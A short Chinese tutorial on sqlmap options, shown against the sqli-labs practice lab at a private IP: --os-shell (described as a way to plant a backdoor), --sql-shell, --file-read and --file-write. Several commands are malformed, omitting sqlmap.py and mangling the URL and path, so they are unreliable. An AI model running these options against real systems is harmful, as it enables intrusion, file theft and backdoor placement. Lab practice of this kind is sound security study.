SQL注入工具SQLmap的常用參數(shù)
SQLmap是一款自動(dòng)化的SQL注入工具,旨在掃描、發(fā)現(xiàn)并利用給定URL中的SQL注入漏洞。它目前支持的數(shù)據(jù)庫有MySQL、Oracle、PostgreSQL、Microsoft SQL Server
SQLmap是一款自動(dòng)化的SQL注入工具,旨在掃描、發(fā)現(xiàn)并利用給定URL中的SQL注入漏洞。它目前支持的數(shù)據(jù)庫有MySQL、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Acess、IBM DB2、SQLLite、Firebird、Sybase和SAP MaxDB等。
SQLmap采用了幾種獨(dú)特的SQL注入技術(shù),包括盲推理SQL注入、UNION查詢SQL注入以及對查詢和盲注的處理。除此之外,SQLmap還提供了廣泛的功能和選項(xiàng),例如數(shù)據(jù)庫指紋識(shí)別、枚舉、數(shù)據(jù)庫提取、訪問目標(biāo)文件系統(tǒng),以及在獲取完全操作權(quán)限時(shí)執(zhí)行任意命令等。
示例:使用SQLmap參數(shù)進(jìn)行SQL注入
本文以sqli-labs第一關(guān)為例,介紹更強(qiáng)大的SQLmap參數(shù)來執(zhí)行不同的操作。
1. 使用"--os-shell"參數(shù)可以執(zhí)行操作系統(tǒng)命令。例如:
```
python2 -u "http://10.10.10.1/sqli-labs-master/Less-1/?id1" --os-shell
```
這樣做通常是為了寫入后門文件并調(diào)用它。
2. 使用"--sql-shell"參數(shù)可以執(zhí)行SQL語句命令。例如:
```
python2 -u "http://10.10.10.1/sqli-labs-master/Less-1/?id1" --sql-shell
```
這樣可以進(jìn)入命令框模式,并直接輸入SQL命令。
3. 使用"--file-read"參數(shù)可以讀取文件內(nèi)容。例如:
```
python2 -u "http://10.10.10.1/sqli-labs-master/Less-1/?id1" --file-read 文件目錄
```
其中,文件目錄可以是任意需要讀取的文件路徑,例如讀取桌面上的test.txt文件。
4. 讀取的信息會(huì)存放在"C:UsersAdministrator.sqlmapoutput10.10.10.1"目錄下。
5. 使用"--file-write"和"--file-dest"參數(shù)可以將本地文件寫入注入服務(wù)器中。例如:
```
python2 -u "http://10.10.10.1/sqli-labs-master/Less-1/?id1" --file-write 本地文件 --file-dest 目標(biāo)目錄及文件
```
在這個(gè)示例中,在本地搭建的環(huán)境中,將桌面上的test.txt文件寫入注入服務(wù)器的桌面下的test1.txt文件。
通過使用這些SQLmap常用的參數(shù),我們可以更靈活地利用SQL注入漏洞,并執(zhí)行各種操作,包括執(zhí)行操作系統(tǒng)命令、執(zhí)行SQL語句命令以及讀取和寫入文件等。